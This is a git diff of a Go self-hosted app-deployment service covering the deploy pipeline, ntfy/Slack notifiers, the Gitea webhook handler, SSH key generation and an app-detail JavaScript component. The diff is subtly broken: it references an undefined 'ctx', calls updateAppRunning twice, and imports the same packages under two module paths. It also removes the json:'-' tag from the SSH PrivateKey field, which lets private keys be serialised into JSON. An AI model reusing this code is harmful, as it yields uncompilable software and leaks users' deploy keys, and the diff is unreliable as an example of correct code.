 	bgCtx context.Context,
 	app *models.App,
 	deployment *models.Deployment,
 ) error {
 	// Build phase with timeout
-	imageID, err := svc.buildImageWithTimeout(deployCtx, app, deployment)
+	imageID, err := svc.buildImageWithTimeout(ctx, app, deployment)
 	if err != nil {
 		cancelErr := svc.checkCancelled(deployCtx, bgCtx, app, deployment, "")
 		if cancelErr != nil {
 			return cancelErr
 		}
 		return err
 	}
-	svc.notify.NotifyBuildSuccess(bgCtx, app, deployment)
+	svc.notify.NotifyBuildSuccess(ctx, app, deployment)
 	// Deploy phase with timeout
-	err = svc.deployContainerWithTimeout(deployCtx, app, deployment, imageID)
+	err = svc.deployContainerWithTimeout(ctx, app, deployment, imageID)
 	if err != nil {
 		cancelErr := svc.checkCancelled(deployCtx, bgCtx, app, deployment, imageID)
 		if cancelErr != nil {
 			return cancelErr
 		}
 		return err
 	}
-	// Save current image as previous before updating to new one
+	err = svc.updateAppRunning(ctx, app, imageID)
 	if app.ImageID.Valid && app.ImageID.String != "" {
 		app.PreviousImageID = app.ImageID
 	}
 	err = svc.updateAppRunning(bgCtx, app, imageID)
 	if err != nil {
 		return err
 	}
 	// Use context.WithoutCancel to ensure health check completes even if
 	// the parent context is cancelled (e.g., HTTP request ends).
-	go svc.checkHealthAfterDelay(bgCtx, app, deployment)
+	go svc.checkHealthAfterDelay(context.WithoutCancel(ctx), app, deployment)
 	return nil
 }
@@ -514,7 +330,7 @@ func (svc *Service) buildImageWithTimeout(
 	ctx context.Context,
 	app *models.App,
 	deployment *models.Deployment,
-) (docker.ImageID, error) {
+) (string, error) {
 	buildCtx, cancel := context.WithTimeout(ctx, buildTimeout)
 	defer cancel()
@@ -539,7 +355,7 @@ func (svc *Service) deployContainerWithTimeout(
 	ctx context.Context,
 	app *models.App,
 	deployment *models.Deployment,
-	imageID docker.ImageID,
+	imageID string,
 ) error {
 	deployCtx, cancel := context.WithTimeout(ctx, deployTimeout)
 	defer cancel()
@@ -641,96 +457,6 @@ func (svc *Service) unlockApp(appID string) {
 	svc.getAppLock(appID).Unlock()
 }
 // cancelActiveDeploy cancels any in-progress deployment for the given app
 // and waits for it to finish before returning.
 func (svc *Service) cancelActiveDeploy(appID string) {
 	val, ok := svc.activeDeploys.Load(appID)
 	if !ok {
 		return
 	}
 	ad, ok := val.(*activeDeploy)
 	if !ok {
 		return
 	}
 	svc.log.Info("cancelling in-progress deployment", "app_id", appID)
 	ad.cancel()
 	<-ad.done
 }
 // checkCancelled checks if the deploy context was cancelled (by a newer deploy)
 // and if so, marks the deployment as cancelled and cleans up orphan resources.
 // Returns ErrDeployCancelled or nil.
 func (svc *Service) checkCancelled(
 	deployCtx context.Context,
 	bgCtx context.Context,
 	app *models.App,
 	deployment *models.Deployment,
 	imageID docker.ImageID,
 ) error {
 	if !errors.Is(deployCtx.Err(), context.Canceled) {
 		return nil
 	}
 	svc.log.Info("deployment cancelled", "app", app.Name)
 	svc.cleanupCancelledDeploy(bgCtx, app, deployment, imageID)
 	_ = deployment.MarkFinished(bgCtx, models.DeploymentStatusCancelled)
 	return ErrDeployCancelled
 }
 // cleanupCancelledDeploy removes orphan resources left by a cancelled deployment.
 func (svc *Service) cleanupCancelledDeploy(
 	ctx context.Context,
 	app *models.App,
 	deployment *models.Deployment,
 	imageID docker.ImageID,
 ) {
 	// Clean up the intermediate Docker image if one was built
 	if imageID != "" {
 		removeErr := svc.docker.RemoveImage(ctx, imageID)
 		if removeErr != nil {
 			svc.log.Error("failed to remove image from cancelled deploy",
 				"error", removeErr, "app", app.Name, "image", imageID)
 			_ = deployment.AppendLog(ctx, "WARNING: failed to clean up image "+imageID.String()+": "+removeErr.Error())
 		} else {
 			svc.log.Info("cleaned up image from cancelled deploy",
 				"app", app.Name, "image", imageID)
 			_ = deployment.AppendLog(ctx, "Cleaned up intermediate image: "+imageID.String())
 		}
 	}
 	// Clean up the build directory for this deployment
 	buildDir := svc.GetBuildDir(app.Name)
 	entries, err := os.ReadDir(buildDir)
 	if err != nil {
 		return
 	}
 	prefix := fmt.Sprintf("%d-", deployment.ID)
 	for _, entry := range entries {
 		if entry.IsDir() && strings.HasPrefix(entry.Name(), prefix) {
 			dirPath := filepath.Join(buildDir, entry.Name())
 			removeErr := os.RemoveAll(dirPath)
 			if removeErr != nil {
 				svc.log.Error("failed to remove build dir from cancelled deploy",
 					"error", removeErr, "path", dirPath)
 			} else {
 				svc.log.Info("cleaned up build dir from cancelled deploy",
 					"app", app.Name, "path", dirPath)
 				_ = deployment.AppendLog(ctx, "Cleaned up build directory")
 			}
 		}
 	}
 }
 func (svc *Service) fetchWebhookEvent(
 	ctx context.Context,
 	webhookEventID *int64,
@@ -816,7 +542,7 @@ func (svc *Service) buildImage(
 	ctx context.Context,
 	app *models.App,
 	deployment *models.Deployment,
-) (docker.ImageID, error) {
+) (string, error) {
 	workDir, cleanup, err := svc.cloneRepository(ctx, app, deployment)
 	if err != nil {
 		return "", err
@@ -850,8 +576,8 @@ func (svc *Service) buildImage(
 		return "", fmt.Errorf("failed to build image: %w", err)
 	}
-	deployment.ImageID = sql.NullString{String: imageID.String(), Valid: true}
+	deployment.ImageID = sql.NullString{String: imageID, Valid: true}
-	_ = deployment.AppendLog(ctx, "Image built: "+imageID.String())
+	_ = deployment.AppendLog(ctx, "Image built: "+imageID)
 	return imageID, nil
 }
@@ -1009,16 +735,16 @@ func (svc *Service) removeOldContainer(
 		svc.log.Warn("failed to remove old container", "error", removeErr)
 	}
-	_ = deployment.AppendLog(ctx, "Old container removed: "+string(containerInfo.ID[:12]))
+	_ = deployment.AppendLog(ctx, "Old container removed: "+containerInfo.ID[:12])
 }
 func (svc *Service) createAndStartContainer(
 	ctx context.Context,
 	app *models.App,
 	deployment *models.Deployment,
-	imageID docker.ImageID,
+	_ string,
-) (docker.ContainerID, error) {
+) (string, error) {
-	containerOpts, err := svc.buildContainerOptions(ctx, app, imageID)
+	containerOpts, err := svc.buildContainerOptions(ctx, app, deployment.ID)
 	if err != nil {
 		svc.failDeployment(ctx, app, deployment, err)
@@ -1038,8 +764,8 @@ func (svc *Service) createAndStartContainer(
 		return "", fmt.Errorf("failed to create container: %w", err)
 	}
-	deployment.ContainerID = sql.NullString{String: containerID.String(), Valid: true}
+	deployment.ContainerID = sql.NullString{String: containerID, Valid: true}
-	_ = deployment.AppendLog(ctx, "Container created: "+containerID.String())
+	_ = deployment.AppendLog(ctx, "Container created: "+containerID)
 	startErr := svc.docker.StartContainer(ctx, containerID)
 	if startErr != nil {
@@ -1062,7 +788,7 @@ func (svc *Service) createAndStartContainer(
 func (svc *Service) buildContainerOptions(
 	ctx context.Context,
 	app *models.App,
-	imageID docker.ImageID,
+	deploymentID int64,
 ) (docker.CreateContainerOptions, error) {
 	envVars, err := app.GetEnvVars(ctx)
 	if err != nil {
@@ -1096,7 +822,7 @@ func (svc *Service) buildContainerOptions(
 	return docker.CreateContainerOptions{
 		Name:    "upaas-" + app.Name,
-		Image:   imageID.String(),
+		Image:   fmt.Sprintf("upaas-%s:%d", app.Name, deploymentID),
 		Env:     envMap,
 		Labels:  buildLabelMap(app, labels),
 		Volumes: buildVolumeMounts(volumes),
@@ -1146,9 +872,9 @@ func buildPortMappings(ports []*models.Port) []docker.PortMapping {
 func (svc *Service) updateAppRunning(
 	ctx context.Context,
 	app *models.App,
-	imageID docker.ImageID,
+	imageID string,
 ) error {
-	app.ImageID = sql.NullString{String: imageID.String(), Valid: true}
+	app.ImageID = sql.NullString{String: imageID, Valid: true}
 	app.Status = models.AppStatusRunning
 	saveErr := app.Save(ctx)
--- a/internal/service/deploy/deploy_cancel_test.go
+++ b/internal/service/deploy/deploy_cancel_test.go
@@ -1,133 +0,0 @@
 package deploy_test
 import (
 	"context"
 	"log/slog"
 	"sync"
 	"testing"
 	"time"
 	"github.com/stretchr/testify/assert"
 	"sneak.berlin/go/upaas/internal/service/deploy"
 )
 func TestCancelActiveDeploy_NoExisting(t *testing.T) {
 	t.Parallel()
 	svc := deploy.NewTestService(slog.Default())
 	// Should not panic or block when no active deploy exists
 	svc.CancelActiveDeploy("nonexistent-app")
 }
 func TestCancelActiveDeploy_CancelsAndWaits(t *testing.T) {
 	t.Parallel()
 	svc := deploy.NewTestService(slog.Default())
 	ctx, cancel := context.WithCancel(context.Background())
 	done := make(chan struct{})
 	svc.RegisterActiveDeploy("app-1", cancel, done)
 	// Simulate a running deploy that respects cancellation
 	var deployFinished bool
 	go func() {
 		<-ctx.Done()
 		deployFinished = true
 		close(done)
 	}()
 	svc.CancelActiveDeploy("app-1")
 	assert.True(t, deployFinished, "deploy should have finished after cancellation")
 }
 func TestCancelActiveDeploy_BlocksUntilDone(t *testing.T) {
 	t.Parallel()
 	svc := deploy.NewTestService(slog.Default())
 	ctx, cancel := context.WithCancel(context.Background())
 	done := make(chan struct{})
 	svc.RegisterActiveDeploy("app-2", cancel, done)
 	// Simulate slow cleanup after cancellation
 	go func() {
 		<-ctx.Done()
 		time.Sleep(50 * time.Millisecond)
 		close(done)
 	}()
 	start := time.Now()
 	svc.CancelActiveDeploy("app-2")
 	elapsed := time.Since(start)
 	assert.GreaterOrEqual(t, elapsed, 50*time.Millisecond,
 		"cancelActiveDeploy should block until the deploy finishes")
 }
 func TestTryLockApp_PreventsConcurrent(t *testing.T) {
 	t.Parallel()
 	svc := deploy.NewTestService(slog.Default())
 	assert.True(t, svc.TryLockApp("app-1"), "first lock should succeed")
 	assert.False(t, svc.TryLockApp("app-1"), "second lock should fail")
 	svc.UnlockApp("app-1")
 	assert.True(t, svc.TryLockApp("app-1"), "lock after unlock should succeed")
 	svc.UnlockApp("app-1")
 }
 func TestCancelActiveDeploy_AllowsNewDeploy(t *testing.T) {
 	t.Parallel()
 	svc := deploy.NewTestService(slog.Default())
 	// Simulate an active deploy holding the lock
 	ctx, cancel := context.WithCancel(context.Background())
 	done := make(chan struct{})
 	svc.RegisterActiveDeploy("app-3", cancel, done)
 	// Lock the app as if a deploy is in progress
 	assert.True(t, svc.TryLockApp("app-3"))
 	// Simulate deploy goroutine: release lock on cancellation
 	var mu sync.Mutex
 	released := false
 	go func() {
 		<-ctx.Done()
 		svc.UnlockApp("app-3")
 		mu.Lock()
 		released = true
 		mu.Unlock()
 		close(done)
 	}()
 	// Cancel should cause the old deploy to release its lock
 	svc.CancelActiveDeploy("app-3")
 	mu.Lock()
 	assert.True(t, released)
 	mu.Unlock()
 	// Now a new deploy should be able to acquire the lock
 	assert.True(t, svc.TryLockApp("app-3"), "should be able to lock after cancellation")
 	svc.UnlockApp("app-3")
 }
--- a/internal/service/deploy/deploy_cleanup_test.go
+++ b/internal/service/deploy/deploy_cleanup_test.go
@@ -1,63 +0,0 @@
 package deploy_test
 import (
 	"context"
 	"log/slog"
 	"os"
 	"path/filepath"
 	"testing"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
 	"sneak.berlin/go/upaas/internal/config"
 	"sneak.berlin/go/upaas/internal/service/deploy"
 )
 func TestCleanupCancelledDeploy_RemovesBuildDir(t *testing.T) {
 	t.Parallel()
 	tmpDir := t.TempDir()
 	cfg := &config.Config{DataDir: tmpDir}
 	svc := deploy.NewTestServiceWithConfig(slog.Default(), cfg, nil)
 	// Create a fake build directory matching the deployment pattern
 	appName := "test-app"
 	buildDir := svc.GetBuildDirExported(appName)
 	require.NoError(t, os.MkdirAll(buildDir, 0o750))
 	// Create deployment-specific dir: <deploymentID>-<random>
 	deployDir := filepath.Join(buildDir, "42-abc123")
 	require.NoError(t, os.MkdirAll(deployDir, 0o750))
 	// Create a file inside to verify full removal
 	require.NoError(t, os.WriteFile(filepath.Join(deployDir, "work"), []byte("test"), 0o600))
 	// Also create a dir for a different deployment (should NOT be removed)
 	otherDir := filepath.Join(buildDir, "99-xyz789")
 	require.NoError(t, os.MkdirAll(otherDir, 0o750))
 	// Run cleanup for deployment 42
 	svc.CleanupCancelledDeploy(context.Background(), appName, 42, "")
 	// Deployment 42's dir should be gone
 	_, err := os.Stat(deployDir)
 	assert.True(t, os.IsNotExist(err), "deployment build dir should be removed")
 	// Deployment 99's dir should still exist
 	_, err = os.Stat(otherDir)
 	assert.NoError(t, err, "other deployment build dir should not be removed")
 }
 func TestCleanupCancelledDeploy_NoBuildDir(t *testing.T) {
 	t.Parallel()
 	tmpDir := t.TempDir()
 	cfg := &config.Config{DataDir: tmpDir}
 	svc := deploy.NewTestServiceWithConfig(slog.Default(), cfg, nil)
 	// Should not panic when build dir doesn't exist
 	svc.CleanupCancelledDeploy(context.Background(), "nonexistent-app", 1, "")
 }
--- a/internal/service/deploy/deploy_container_test.go
+++ b/internal/service/deploy/deploy_container_test.go
@@ -1,45 +0,0 @@
 package deploy_test
 import (
 	"context"
 	"log/slog"
 	"os"
 	"testing"
 	"sneak.berlin/go/upaas/internal/database"
 	"sneak.berlin/go/upaas/internal/docker"
 	"sneak.berlin/go/upaas/internal/models"
 	"sneak.berlin/go/upaas/internal/service/deploy"
 )
 func TestBuildContainerOptionsUsesImageID(t *testing.T) {
 	t.Parallel()
 	db := database.NewTestDatabase(t)
 	app := models.NewApp(db)
 	app.Name = "myapp"
 	err := app.Save(context.Background())
 	if err != nil {
 		t.Fatalf("failed to save app: %v", err)
 	}
 	log := slog.New(slog.NewTextHandler(os.Stderr, nil))
 	svc := deploy.NewTestService(log)
 	const expectedImageID = docker.ImageID("sha256:abc123def456")
 	opts, err := svc.BuildContainerOptionsExported(context.Background(), app, expectedImageID)
 	if err != nil {
 		t.Fatalf("buildContainerOptions returned error: %v", err)
 	}
 	if opts.Image != expectedImageID.String() {
 		t.Errorf("expected Image=%q, got %q", expectedImageID, opts.Image)
 	}
 	if opts.Name != "upaas-myapp" {
 		t.Errorf("expected Name=%q, got %q", "upaas-myapp", opts.Name)
 	}
 }
--- a/internal/service/deploy/export_test.go
+++ b/internal/service/deploy/export_test.go
@@ -1,92 +0,0 @@
 package deploy
 import (
 	"context"
 	"fmt"
 	"log/slog"
 	"os"
 	"path/filepath"
 	"strings"
 	"sneak.berlin/go/upaas/internal/config"
 	"sneak.berlin/go/upaas/internal/docker"
 	"sneak.berlin/go/upaas/internal/models"
 )
 // NewTestService creates a Service with minimal dependencies for testing.
 func NewTestService(log *slog.Logger) *Service {
 	return &Service{
 		log: log,
 	}
 }
 // CancelActiveDeploy exposes cancelActiveDeploy for testing.
 func (svc *Service) CancelActiveDeploy(appID string) {
 	svc.cancelActiveDeploy(appID)
 }
 // RegisterActiveDeploy registers an active deploy for testing.
 func (svc *Service) RegisterActiveDeploy(appID string, cancel context.CancelFunc, done chan struct{}) {
 	svc.activeDeploys.Store(appID, &activeDeploy{cancel: cancel, done: done})
 }
 // TryLockApp exposes tryLockApp for testing.
 func (svc *Service) TryLockApp(appID string) bool {
 	return svc.tryLockApp(appID)
 }
 // UnlockApp exposes unlockApp for testing.
 func (svc *Service) UnlockApp(appID string) {
 	svc.unlockApp(appID)
 }
 // NewTestServiceWithConfig creates a Service with config and docker client for testing.
 func NewTestServiceWithConfig(log *slog.Logger, cfg *config.Config, dockerClient *docker.Client) *Service {
 	return &Service{
 		log:    log,
 		config: cfg,
 		docker: dockerClient,
 	}
 }
 // CleanupCancelledDeploy exposes the build directory cleanup portion of
 // cleanupCancelledDeploy for testing. It removes build directories matching
 // the deployment ID prefix.
 func (svc *Service) CleanupCancelledDeploy(
 	_ context.Context,
 	appName string,
 	deploymentID int64,
 	_ string,
 ) {
 	// We can't create real models.App/Deployment in tests easily,
 	// so we test the build dir cleanup portion directly.
 	buildDir := svc.GetBuildDir(appName)
 	entries, err := os.ReadDir(buildDir)
 	if err != nil {
 		return
 	}
 	prefix := fmt.Sprintf("%d-", deploymentID)
 	for _, entry := range entries {
 		if entry.IsDir() && strings.HasPrefix(entry.Name(), prefix) {
 			dirPath := filepath.Join(buildDir, entry.Name())
 			_ = os.RemoveAll(dirPath)
 		}
 	}
 }
 // GetBuildDirExported exposes GetBuildDir for testing.
 func (svc *Service) GetBuildDirExported(appName string) string {
 	return svc.GetBuildDir(appName)
 }
 // BuildContainerOptionsExported exposes buildContainerOptions for testing.
 func (svc *Service) BuildContainerOptionsExported(
 	ctx context.Context,
 	app *models.App,
 	imageID docker.ImageID,
 ) (docker.CreateContainerOptions, error) {
 	return svc.buildContainerOptions(ctx, app, imageID)
 }
--- a/internal/service/notify/notify.go
+++ b/internal/service/notify/notify.go
@@ -10,13 +10,12 @@ import (
 	"fmt"
 	"log/slog"
 	"net/http"
 	"net/url"
 	"time"
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/logger"
-	"sneak.berlin/go/upaas/internal/models"
+	"git.eeqj.de/sneak/upaas/internal/models"
 )
 // HTTP client timeout.
@@ -248,15 +247,10 @@ func (svc *Service) sendNtfy(
 ) error {
 	svc.log.Debug("sending ntfy notification", "topic", topic, "title", title)
 	parsedURL, err := url.ParseRequestURI(topic)
 	if err != nil {
 		return fmt.Errorf("invalid ntfy topic URL: %w", err)
 	}
 	request, err := http.NewRequestWithContext(
 		ctx,
 		http.MethodPost,
-		parsedURL.String(),
+		topic,
 		bytes.NewBufferString(message),
 	)
 	if err != nil {
@@ -266,7 +260,7 @@ func (svc *Service) sendNtfy(
 	request.Header.Set("Title", title)
 	request.Header.Set("Priority", svc.ntfyPriority(priority))
-	resp, err := svc.client.Do(request) // #nosec G704 -- URL from validated config, not user input
+	resp, err := svc.client.Do(request)
 	if err != nil {
 		return fmt.Errorf("failed to send ntfy request: %w", err)
 	}
@@ -346,15 +340,10 @@ func (svc *Service) sendSlack(
 		return fmt.Errorf("failed to marshal slack payload: %w", err)
 	}
 	parsedWebhookURL, err := url.ParseRequestURI(webhookURL)
 	if err != nil {
 		return fmt.Errorf("invalid slack webhook URL: %w", err)
 	}
 	request, err := http.NewRequestWithContext(
 		ctx,
 		http.MethodPost,
-		parsedWebhookURL.String(),
+		webhookURL,
 		bytes.NewBuffer(body),
 	)
 	if err != nil {
@@ -363,7 +352,7 @@ func (svc *Service) sendSlack(
 	request.Header.Set("Content-Type", "application/json")
-	resp, err := svc.client.Do(request) // #nosec G704 -- URL from validated config, not user input
+	resp, err := svc.client.Do(request)
 	if err != nil {
 		return fmt.Errorf("failed to send slack request: %w", err)
 	}
--- a/internal/service/webhook/types.go
+++ b/internal/service/webhook/types.go
@@ -1,10 +0,0 @@
 package webhook
 // UnparsedURL is a URL stored as a plain string without parsing.
 // Use this instead of string when the value is known to be a URL
 // but should not be parsed into a net/url.URL (e.g. webhook URLs,
 // compare URLs from external payloads).
 type UnparsedURL string
 // String implements the fmt.Stringer interface.
 func (u UnparsedURL) String() string { return string(u) }
--- a/internal/service/webhook/webhook.go
+++ b/internal/service/webhook/webhook.go
@@ -10,11 +10,10 @@ import (
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
-
+	"git.eeqj.de/sneak/upaas/internal/logger"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/models"
-	"sneak.berlin/go/upaas/internal/models"
+	"git.eeqj.de/sneak/upaas/internal/service/deploy"
 	"sneak.berlin/go/upaas/internal/service/deploy"
 )
 // ServiceParams contains dependencies for Service.
@@ -51,12 +50,12 @@ type GiteaPushPayload struct {
 	Ref        string `json:"ref"`
 	Before     string `json:"before"`
 	After      string `json:"after"`
-	CompareURL UnparsedURL `json:"compare_url"`
+	CompareURL string `json:"compare_url"`
 	Repository struct {
 		FullName string `json:"full_name"`
-		CloneURL UnparsedURL `json:"clone_url"`
+		CloneURL string `json:"clone_url"`
 		SSHURL   string `json:"ssh_url"`
-		HTMLURL  UnparsedURL `json:"html_url"`
+		HTMLURL  string `json:"html_url"`
 	} `json:"repository"`
 	Pusher struct {
 		Username string `json:"username"`
@@ -64,7 +63,7 @@ type GiteaPushPayload struct {
 	} `json:"pusher"`
 	Commits []struct {
 		ID      string `json:"id"`
-		URL     UnparsedURL `json:"url"`
+		URL     string `json:"url"`
 		Message string `json:"message"`
 		Author  struct {
 			Name  string `json:"name"`
@@ -105,7 +104,7 @@ func (svc *Service) HandleWebhook(
 	event.EventType = eventType
 	event.Branch = branch
 	event.CommitSHA = sql.NullString{String: commitSHA, Valid: commitSHA != ""}
-	event.CommitURL = sql.NullString{String: commitURL.String(), Valid: commitURL != ""}
+	event.CommitURL = sql.NullString{String: commitURL, Valid: commitURL != ""}
 	event.Payload = sql.NullString{String: string(payload), Valid: true}
 	event.Matched = matched
 	event.Processed = false
@@ -144,7 +143,7 @@ func (svc *Service) triggerDeployment(
 		// even if the HTTP request context is cancelled.
 		deployCtx := context.WithoutCancel(ctx)
-		deployErr := svc.deploy.Deploy(deployCtx, app, &eventID, true)
+		deployErr := svc.deploy.Deploy(deployCtx, app, &eventID)
 		if deployErr != nil {
 			svc.log.Error("deployment failed", "error", deployErr, "app", appName)
 		}
@@ -169,7 +168,7 @@ func extractBranch(ref string) string {
 // extractCommitURL extracts the commit URL from the webhook payload.
 // Prefers the URL from the head commit, falls back to constructing from repo URL.
-func extractCommitURL(payload GiteaPushPayload) UnparsedURL {
+func extractCommitURL(payload GiteaPushPayload) string {
 	// Try to find the URL from the head commit (matching After SHA)
 	for _, commit := range payload.Commits {
 		if commit.ID == payload.After && commit.URL != "" {
@@ -179,7 +178,7 @@ func extractCommitURL(payload GiteaPushPayload) UnparsedURL {
 	// Fall back to constructing URL from repo HTML URL
 	if payload.Repository.HTMLURL != "" && payload.After != "" {
-		return UnparsedURL(payload.Repository.HTMLURL.String() + "/commit/" + payload.After)
+		return payload.Repository.HTMLURL + "/commit/" + payload.After
 	}
 	return ""
--- a/internal/service/webhook/webhook_test.go
+++ b/internal/service/webhook/webhook_test.go
@@ -12,15 +12,15 @@ import (
 	"github.com/stretchr/testify/require"
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/config"
+	"git.eeqj.de/sneak/upaas/internal/config"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
-	"sneak.berlin/go/upaas/internal/docker"
+	"git.eeqj.de/sneak/upaas/internal/docker"
-	"sneak.berlin/go/upaas/internal/globals"
+	"git.eeqj.de/sneak/upaas/internal/globals"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/logger"
-	"sneak.berlin/go/upaas/internal/models"
+	"git.eeqj.de/sneak/upaas/internal/models"
-	"sneak.berlin/go/upaas/internal/service/deploy"
+	"git.eeqj.de/sneak/upaas/internal/service/deploy"
-	"sneak.berlin/go/upaas/internal/service/notify"
+	"git.eeqj.de/sneak/upaas/internal/service/notify"
-	"sneak.berlin/go/upaas/internal/service/webhook"
+	"git.eeqj.de/sneak/upaas/internal/service/webhook"
 )
 type testDeps struct {
@@ -91,7 +91,6 @@ func createTestApp(
 	app.Branch = branch
 	app.DockerfilePath = "Dockerfile"
 	app.WebhookSecret = "webhook-secret-123"
 	app.WebhookSecretHash = database.HashWebhookSecret(app.WebhookSecret)
 	app.SSHPrivateKey = "private-key"
 	app.SSHPublicKey = "public-key"
 	app.Status = models.AppStatusPending
--- a/internal/ssh/keygen.go
+++ b/internal/ssh/keygen.go
@@ -12,7 +12,7 @@ import (
 // KeyPair contains an SSH key pair.
 type KeyPair struct {
-	PrivateKey string `json:"-"`
+	PrivateKey string
 	PublicKey  string
 }
--- a/internal/ssh/keygen_test.go
+++ b/internal/ssh/keygen_test.go
@@ -4,9 +4,9 @@ import (
 	"strings"
 	"testing"
 	"git.eeqj.de/sneak/upaas/internal/ssh"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
 	"sneak.berlin/go/upaas/internal/ssh"
 )
 func TestGenerateKeyPair(t *testing.T) {
--- a/static/css/input.css
+++ b/static/css/input.css
@@ -57,10 +57,6 @@
    @apply inline-flex items-center justify-center px-4 py-2 rounded-md font-medium text-sm transition-all duration-200 focus:outline-none focus:ring-2 focus:ring-offset-2 disabled:opacity-50 disabled:cursor-not-allowed bg-success-500 text-white hover:bg-success-700 active:bg-green-800 focus:ring-green-500 shadow-elevation-1 hover:shadow-elevation-2;
  }
  .btn-warning {
    @apply inline-flex items-center justify-center px-4 py-2 rounded-md font-medium text-sm transition-all duration-200 focus:outline-none focus:ring-2 focus:ring-offset-2 disabled:opacity-50 disabled:cursor-not-allowed bg-warning-500 text-white hover:bg-warning-700 active:bg-orange-800 focus:ring-orange-500 shadow-elevation-1 hover:shadow-elevation-2;
  }
  .btn-text {
    @apply inline-flex items-center justify-center px-4 py-2 rounded-md font-medium text-sm transition-all duration-200 focus:outline-none focus:ring-2 focus:ring-offset-2 disabled:opacity-50 disabled:cursor-not-allowed text-primary-600 hover:bg-primary-50 active:bg-primary-100;
  }
--- a/static/js/alpine.min.js
+++ b/static/js/alpine.min.js
--- a/static/js/app-detail.js
+++ b/static/js/app-detail.js
@@ -1,220 +0,0 @@
 /**
 * upaas - App Detail Page Component
 *
 * Handles the single-app view: status polling, container logs,
 * build logs, and recent deployments list.
 */
 document.addEventListener("alpine:init", () => {
    Alpine.data("appDetail", (config) => ({
        appId: config.appId,
        currentDeploymentId: config.initialDeploymentId,
        appStatus: config.initialStatus || "unknown",
        containerLogs: "Loading container logs...",
        containerStatus: "unknown",
        buildLogs: config.initialDeploymentId
            ? "Loading build logs..."
            : "No deployments yet",
        buildStatus: config.initialBuildStatus || "unknown",
        showBuildLogs: !!config.initialDeploymentId,
        deploying: false,
        deployments: [],
        // Track whether user wants auto-scroll (per log pane)
        _containerAutoScroll: true,
        _buildAutoScroll: true,
        _pollTimer: null,
        init() {
            this.deploying = Alpine.store("utils").isDeploying(this.appStatus);
            this.fetchAll();
            this._schedulePoll();
            // Set up scroll listeners after DOM is ready
            this.$nextTick(() => {
                this._initScrollTracking(
                    this.$refs.containerLogsWrapper,
                    "_containerAutoScroll",
                );
                this._initScrollTracking(
                    this.$refs.buildLogsWrapper,
                    "_buildAutoScroll",
                );
            });
        },
        _schedulePoll() {
            if (this._pollTimer) clearTimeout(this._pollTimer);
            const interval = Alpine.store("utils").isDeploying(this.appStatus)
                ? 1000
                : 10000;
            this._pollTimer = setTimeout(() => {
                this.fetchAll();
                this._schedulePoll();
            }, interval);
        },
        _initScrollTracking(el, flag) {
            if (!el) return;
            el.addEventListener(
                "scroll",
                () => {
                    this[flag] = Alpine.store("utils").isScrolledToBottom(el);
                },
                { passive: true },
            );
        },
        fetchAll() {
            this.fetchAppStatus();
            // Only fetch logs when the respective pane is visible
            if (
                this.$refs.containerLogsWrapper &&
                this._isElementVisible(this.$refs.containerLogsWrapper)
            ) {
                this.fetchContainerLogs();
            }
            if (
                this.showBuildLogs &&
                this.$refs.buildLogsWrapper &&
                this._isElementVisible(this.$refs.buildLogsWrapper)
            ) {
                this.fetchBuildLogs();
            }
            this.fetchRecentDeployments();
        },
        _isElementVisible(el) {
            if (!el) return false;
            // Check if element is in viewport (roughly)
            const rect = el.getBoundingClientRect();
            return rect.bottom > 0 && rect.top < window.innerHeight;
        },
        async fetchAppStatus() {
            try {
                const res = await fetch(`/apps/${this.appId}/status`);
                const data = await res.json();
                const wasDeploying = this.deploying;
                this.appStatus = data.status;
                this.deploying = Alpine.store("utils").isDeploying(data.status);
                // Re-schedule polling when deployment state changes
                if (this.deploying !== wasDeploying) {
                    this._schedulePoll();
                }
                if (
                    data.latestDeploymentID &&
                    data.latestDeploymentID !== this.currentDeploymentId
                ) {
                    this.currentDeploymentId = data.latestDeploymentID;
                    this.showBuildLogs = true;
                    this.fetchBuildLogs();
                }
            } catch (err) {
                console.error("Status fetch error:", err);
            }
        },
        async fetchContainerLogs() {
            try {
                const res = await fetch(`/apps/${this.appId}/container-logs`);
                const data = await res.json();
                const newLogs = data.logs || "No logs available";
                const changed = newLogs !== this.containerLogs;
                this.containerLogs = newLogs;
                this.containerStatus = data.status;
                if (changed && this._containerAutoScroll) {
                    this.$nextTick(() => {
                        Alpine.store("utils").scrollToBottom(
                            this.$refs.containerLogsWrapper,
                        );
                    });
                }
            } catch (err) {
                this.containerLogs = "Failed to fetch logs";
            }
        },
        async fetchBuildLogs() {
            if (!this.currentDeploymentId) return;
            try {
                const res = await fetch(
                    `/apps/${this.appId}/deployments/${this.currentDeploymentId}/logs`,
                );
                const data = await res.json();
                const newLogs = data.logs || "No build logs available";
                const changed = newLogs !== this.buildLogs;
                this.buildLogs = newLogs;
                this.buildStatus = data.status;
                if (changed && this._buildAutoScroll) {
                    this.$nextTick(() => {
                        Alpine.store("utils").scrollToBottom(
                            this.$refs.buildLogsWrapper,
                        );
                    });
                }
            } catch (err) {
                this.buildLogs = "Failed to fetch logs";
            }
        },
        async fetchRecentDeployments() {
            try {
                const res = await fetch(
                    `/apps/${this.appId}/recent-deployments`,
                );
                const data = await res.json();
                this.deployments = data.deployments || [];
            } catch (err) {
                console.error("Deployments fetch error:", err);
            }
        },
        submitDeploy() {
            this.deploying = true;
        },
        get statusBadgeClass() {
            return Alpine.store("utils").statusBadgeClass(this.appStatus);
        },
        get statusLabel() {
            return Alpine.store("utils").statusLabel(this.appStatus);
        },
        get containerStatusBadgeClass() {
            return (
                Alpine.store("utils").statusBadgeClass(this.containerStatus) +
                " text-xs"
            );
        },
        get containerStatusLabel() {
            return Alpine.store("utils").statusLabel(this.containerStatus);
        },
        get buildStatusBadgeClass() {
            return (
                Alpine.store("utils").statusBadgeClass(this.buildStatus) +
                " text-xs"
            );
        },
        get buildStatusLabel() {
            return Alpine.store("utils").statusLabel(this.buildStatus);
        },
        deploymentStatusClass(status) {
            return Alpine.store("utils").statusBadgeClass(status);
        },
        deploymentStatusLabel(status) {
